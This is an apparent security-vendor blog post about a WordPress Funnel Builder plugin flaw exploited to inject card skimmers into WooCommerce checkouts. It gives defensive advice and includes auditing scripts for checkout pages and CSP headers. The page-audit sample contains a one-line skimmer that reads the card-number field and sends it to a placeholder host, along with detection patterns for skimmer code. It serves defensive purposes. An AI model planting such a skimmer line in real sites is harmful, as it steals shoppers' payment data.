
WordPress Plugin Vulnerability Alert: Credit Card Theft Risk

Critical WordPress Plugin Vulnerability Exposes Online Stores to Credit Card Theft

A dangerous WordPress plugin vulnerability is currently being exploited by cybercriminals to steal credit card information from thousands of WooCommerce stores across Australia and globally. Security researchers have confirmed that attackers are actively targeting the popular Funnel Builder plugin, injecting malicious JavaScript code into checkout pages to harvest customer payment data in real time.

This attack represents a significant threat to e-commerce businesses, particularly small and medium enterprises that rely on WordPress and WooCommerce for their online sales operations. If your business uses this plugin, immediate action is required to protect your customers and your reputation.

Original reporting by BleepingComputer: Funnel Builder WordPress plugin bug exploited to steal credit cards — May 17, 2026

What Happened With the Funnel Builder Plugin?

The vulnerability affects Funnel Builder for WordPress, a widely used plugin that helps businesses create sales funnels and optimise their WooCommerce checkout experience. Security analysts discovered that a critical flaw in the plugin’s code allows unauthenticated attackers to inject malicious scripts directly into checkout pages.

Once exploited, the attackers deploy JavaScript-based credit card skimmers that capture payment information as customers enter their details. This data is then silently transmitted to attacker-controlled servers without the store owner or customer being aware of the compromise.

Timeline of the Attack

  • Initial discovery: Security researchers identified active exploitation in mid-May 2026
  • Attack vector: Unauthenticated remote code injection via plugin vulnerability
  • Payload: Obfuscated JavaScript credit card skimmer
  • Data exfiltration: Real-time transmission of payment details to external servers

How Does This WordPress Plugin Vulnerability Work?

The technical nature of this attack makes it particularly dangerous because it requires no authentication. Attackers can exploit the WordPress plugin vulnerability remotely without needing login credentials or administrative access to the target website.

Attack Mechanics Explained

The vulnerability exists in how the Funnel Builder plugin handles certain input parameters. Attackers craft specially designed requests that bypass security controls, allowing them to inject arbitrary JavaScript code into the plugin’s output.

This injected code specifically targets WooCommerce checkout forms, adding invisible event listeners that capture:

  • Credit card numbers
  • Cardholder names
  • Expiration dates
  • CVV/security codes
  • Billing addresses

The stolen data is then encoded and transmitted to command-and-control servers, often disguised as legitimate analytics or tracking requests to avoid detection by security tools.

Business Impact of Credit Card Skimming Attacks

For Australian businesses, the consequences of a credit card skimming attack extend far beyond the immediate theft. The financial and reputational damage can be devastating, particularly for small e-commerce operators.

Direct Financial Consequences

  1. PCI DSS compliance violations: Fines ranging from $5,000 to $100,000 per month
  2. Chargeback liability: Responsibility for fraudulent transactions
  3. Forensic investigation costs: Mandatory incident response and auditing
  4. Legal exposure: Potential class action lawsuits from affected customers

Reputational Damage

Consumer trust is difficult to rebuild once compromised. Research indicates that 65% of customers will not return to a business that has experienced a data breach. For e-commerce stores operating in competitive markets, this loss of confidence can be terminal.

Australian businesses also face obligations under the Notifiable Data Breaches scheme, requiring disclosure to affected individuals and the Office of the Australian Information Commissioner when payment data is compromised.

How to Protect Your WooCommerce Store

Immediate action is essential if your business uses the Funnel Builder plugin or operates a WooCommerce store. The following recommendations will help secure your site against this specific WordPress plugin vulnerability and similar threats.

Immediate Steps

  • Update immediately: Check for and apply the latest Funnel Builder plugin update
  • Audit your checkout pages: Inspect source code for unfamiliar JavaScript
  • Review user accounts: Check for unauthorised administrator accounts
  • Scan for malware: Run comprehensive security scans across your WordPress installation
  • Check file integrity: Compare core files against known-good versions
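One way to carry out the "audit your checkout pages" step against the behaviour described under Attack Mechanics, as an added example that is not code from this article or from the Funnel Builder project: it scans saved checkout-page HTML and flags inline scripts that combine the traits a skimmer needs (form listeners, card-field access, outbound requests, obfuscation helpers), external scripts from hosts outside an allowlist, and third-party scripts without Subresource Integrity. SITE_HOST, TRUSTED_HOSTS and the sample page are constructed for illustration.

```javascript
// Added example: scan saved checkout-page HTML for scripts that should not be there.
// Constructed allowlist: a real store lists its own domain, gateway and deliberate CDNs.
const SITE_HOST = 'shop.example.com';
const TRUSTED_HOSTS = new Set([SITE_HOST, 'js.stripe.com']);

// Minimal <script> extractor for saved page source (not a full HTML parser).
const SCRIPT_RE = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
const ATTR_RE = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;

function parseAttrs(raw) {
  const attrs = {};
  for (const m of raw.matchAll(ATTR_RE)) attrs[m[1].toLowerCase()] = m[2] ?? m[3] ?? m[4];
  return attrs;
}

// Traits a checkout skimmer needs (watch input, read card fields, send data out, obfuscate).
const SKIMMER_TRAITS = [
  /addEventListener\s*\(\s*['"](?:input|keyup|keydown|change|submit)['"]/i,
  /\b(?:card|cvv|cvc|expir|billing)\w*/i,
  /\b(?:fetch|XMLHttpRequest|sendBeacon|new\s+Image)\b/i,
  /\b(?:atob|btoa|unescape|fromCharCode)\b/i,
];

function auditCheckoutHtml(html) {
  const findings = [];
  for (const m of html.matchAll(SCRIPT_RE)) {
    const attrs = parseAttrs(m[1]);
    const body = m[2].trim();
    if (attrs.src) {
      let host;
      try { host = new URL(attrs.src, `https://${SITE_HOST}/`).hostname; } catch { host = attrs.src; }
      if (!TRUSTED_HOSTS.has(host)) findings.push({ kind: 'untrusted-src', detail: attrs.src });
      else if (host !== SITE_HOST && !attrs.integrity) findings.push({ kind: 'no-sri', detail: attrs.src });
    } else if (body) {
      const hits = SKIMMER_TRAITS.filter((re) => re.test(body)).length;
      if (hits >= 2) findings.push({ kind: 'suspicious-inline', detail: body.slice(0, 60) });
    }
  }
  return findings;
}

// Constructed sample: gateway script with SRI, first-party script, harmless inline code, then a skimmer.
const SAMPLE_HTML = `
<script src="https://js.stripe.com/v3/" integrity="sha384-PLACEHOLDER"></script>
<script src="/wp-content/plugins/woocommerce/assets/js/frontend/checkout.min.js"></script>
<script>jQuery(function ($) { $('#billing_first_name').focus(); });</script>
<script>document.addEventListener('input',function(){var d=btoa(document.querySelector('#card-number').value);new Image().src='https://cdn-analytics.example.net/t.gif?d='+d;});</script>
<script src="https://cdn-analytics.example.net/track.js"></script>
`;
console.log(auditCheckoutHtml(SAMPLE_HTML));
```

Run it against a page saved from a logged-out browser session, since a skimmer that is served only to anonymous visitors will not appear in the admin's own view.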

Long-Term Security Measures

  1. Implement a Web Application Firewall (WAF): Block malicious requests before they reach your site
  2. Enable Content Security Policy headers: Restrict which scripts can execute on your pages
  3. Use Subresource Integrity: Verify that external scripts haven’t been tampered with
  4. Conduct regular vulnerability assessments: Identify weaknesses before attackers do
  5. Maintain plugin hygiene: Remove unused plugins and keep all components updated
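A check for the Content Security Policy measure above, as an added example that is not code from this article or any plugin: it parses a CSP header and reports the two gaps a checkout skimmer depends on, injected inline script being allowed to run, and fetch or form directives that let the page send data to any origin (which is how exfiltration disguised as analytics traffic gets through). The two policies and the gateway hosts are constructed for illustration.

```javascript
// Added example: audit a Content-Security-Policy header value for the gaps a checkout
// skimmer relies on. Policies below are constructed; the gateway hosts are illustrative.
function parseCsp(header) {
  const csp = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) csp[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return csp;
}

// Fetch directives fall back to default-src when absent; form-action does not.
function effectiveSources(csp, name) {
  if (csp[name]) return csp[name];
  if (name !== 'form-action' && csp['default-src']) return csp['default-src'];
  return null; // unrestricted
}

// '*' or a bare scheme such as https: lets a request reach any host, which is all an
// exfiltration call disguised as "analytics" needs.
function allowsAnyOrigin(sources) {
  return sources === null || sources.some((s) => s === '*' || /^(?:https?|wss?):$/i.test(s));
}

function auditCsp(header) {
  const csp = parseCsp(header);
  const findings = [];
  const script = effectiveSources(csp, 'script-src');
  if (script === null) {
    findings.push('script-src: unrestricted');
  } else {
    // A nonce or hash makes browsers ignore 'unsafe-inline'; without one it is a real gap.
    const hasNonceOrHash = script.some((s) => /^'(?:nonce-|sha(?:256|384|512)-)/.test(s));
    if (script.includes("'unsafe-inline'") && !hasNonceOrHash) findings.push("script-src: 'unsafe-inline' lets injected inline scripts run");
    if (allowsAnyOrigin(script)) findings.push('script-src: scripts may load from any origin');
  }
  for (const name of ['connect-src', 'img-src', 'form-action']) {
    if (allowsAnyOrigin(effectiveSources(csp, name))) findings.push(`${name}: data can be sent to any origin`);
  }
  return findings;
}

// Constructed policies: a permissive one, and a tightened one for a hosted-gateway checkout.
const WEAK_POLICY = "default-src 'self' https:; script-src 'self' 'unsafe-inline' https:";
const STRONG_POLICY = "default-src 'self'; script-src 'self' https://js.stripe.com 'nonce-RANDOM_PER_RESPONSE'; " +
  "connect-src 'self' https://api.stripe.com; img-src 'self' data: https://*.stripe.com; " +
  "frame-src https://js.stripe.com; form-action 'self'";
console.log(auditCsp(WEAK_POLICY));   // five gaps
console.log(auditCsp(STRONG_POLICY)); // []
```

Deploy a tightened policy in Content-Security-Policy-Report-Only mode first and fix the reported violations from WooCommerce, the theme and the gateway before enforcing it, and generate the nonce fresh for every response.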

If you’re unsure whether your site has been compromised, consider engaging OziTechs’ vulnerability management services for a comprehensive security assessment.

Frequently Asked Questions

What is a credit card skimming attack on WordPress?

A credit card skimming attack occurs when malicious JavaScript code is injected into an e-commerce website’s checkout pages. This code secretly captures payment information as customers enter it, then transmits the data to attackers. On WordPress sites, these attacks typically exploit vulnerabilities in plugins or themes to inject the skimmer code.

How can I tell if my WooCommerce store has been compromised?

Signs of compromise include unexpected JavaScript in your checkout pages, unfamiliar user accounts with administrator privileges, unusual outbound network connections, and customer reports of fraudulent charges. However, sophisticated skimmers are designed to avoid detection, making professional security audits essential for definitive assessment.

Is my business liable if customer credit cards are stolen through my website?

Yes, Australian businesses have legal obligations to protect customer data under the Privacy Act 1988 and PCI DSS requirements. If a breach occurs due to inadequate security measures, you may face regulatory penalties, chargeback liability, and potential legal action from affected customers. Proactive security measures and incident response planning are essential risk mitigation strategies.

Key Takeaways

  • The Funnel Builder WordPress plugin vulnerability is being actively exploited to steal credit card data
  • Attackers can inject malicious skimmers without authentication
  • WooCommerce checkout pages are the primary target for payment data theft
  • Immediate plugin updates and security audits are essential
  • Australian businesses face significant regulatory and financial consequences from payment data breaches
  • Implementing WAF protection and Content Security Policies provides additional defence layers

Protect Your Business From WordPress Plugin Vulnerabilities

This WordPress plugin vulnerability serves as a stark reminder that e-commerce security requires constant vigilance. With attackers actively targeting WooCommerce stores, Australian businesses must prioritise their cybersecurity posture to protect both their customers and their operations.

Don’t wait until your business becomes a victim. Proactive security measures, regular vulnerability assessments, and expert guidance can mean the difference between a secure operation and a costly breach.

If you’re concerned about the security of your WordPress or WooCommerce site, speak with our security team today. OziTechs provides comprehensive e-commerce security assessments and ongoing protection services tailored to Australian businesses.
